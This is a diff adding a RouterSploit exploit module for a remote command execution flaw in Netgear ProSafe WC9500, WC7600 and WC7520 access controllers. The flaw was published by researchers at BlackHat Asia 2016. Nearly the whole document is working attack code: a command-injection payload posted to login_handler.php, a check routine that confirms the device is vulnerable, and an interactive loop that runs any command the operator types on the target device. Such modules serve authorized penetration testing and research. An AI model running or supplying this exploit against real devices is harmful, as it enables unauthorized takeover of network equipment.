Netgear Prosafe RCE exploits - BlackHat Asia 2016

routersploit/modules/exploits/netgear/prosafe_rce.py

+import requests
+import re
+
+from routersploit import *
+
+
+class Exploit(exploits.Exploit):
+    """
+    Exploit implementation for Netgear ProSafe WC9500, WC7600, WC7520 remote command execution vulnerability.
+    If the target is vulnerable command shell is invoked.
+    """
+    __info__ = {
+        'name': 'Netgear ProSafe RCE',
+        'description': 'Module exploits remote command execution vulnerability in Netgear ProSafe WC9500, WC7600, WC7520 devices. If the target is vulnerable command shell is invoked.',
+        'authors': [
+            'Andrei Costin <andrei[at]firmware.re>', # vulnerability discovery
+            'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
+         ],
+        'references': [
+            'http://firmware.re/vulns/acsa-2015-002.php',
+            'https://www.blackhat.com/docs/asia-16/materials/asia-16-Costin-Automated-Dynamic-Firmware-Analysis-At-Scale-A-Case-Study-On-Embedded-Web-Interfaces.pdf',
+         ],
+        'targets': [
+            'Netgear ProSafe WC9500',
+            'Netgear ProSafe WC7600',
+            'Netgear ProSafe WC7520',
+         ] 
+    }
+
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
+    port = exploits.Option(80, 'Target port') # default port
+
+    def run(self):
+        if self.check() == True:
+            print_success("Target is vulnerable")
+            print_status("Invoking command loop...")
+            self.command_loop()
+        else:
+            print_error("Target is not vulnerable") 
+
+    def command_loop(self):
+        while 1:
+            cmd = raw_input("cmd > ")
+            print self.execute(cmd)
+
+    def execute(self, cmd):
+        url = sanitize_url("{}:{}/login_handler.php".format(self.target, self.port))
+        headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
+        data = 'reqMethod=json_cli_reqMethod" "json_cli_jsonData";{}; echo ffffffffffffffff'.format(cmd)
+
+        try:
+            r = requests.post(url, headers=headers, data=data)
+            res = r.text
+        except requests.exceptions.MissingSchema:
+            return "Invalid URL format: %s" % url
+        except requests.exceptions.ConnectionError:
+            return "Connection error: %s" % url
+
+        if 'ffffffffffffffff' in res:
+            res = re.findall("(|.+?)ffffffffffffffff", res, re.DOTALL)
+
+            if len(res):
+                return res[0]
+         
+        return False
+
+    def check(self):
+        url = sanitize_url("{}:{}/login_handler.php".format(self.target, self.port))
+        headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
+        data = 'reqMethod=json_cli_reqMethod" "json_cli_jsonData"; echo 9fdbd928b52c1ef61615a6fd2e8b49af'
+
+        try:
+            r = requests.post(url, headers=headers, data=data)
+            res = r.text
+        except:
+            return None # target could not be verified
+
+        if "9fdbd928b52c1ef61615a6fd2e8b49af" in res:
+            return True # target is vulnerable
+
+        return False # target not vulnerable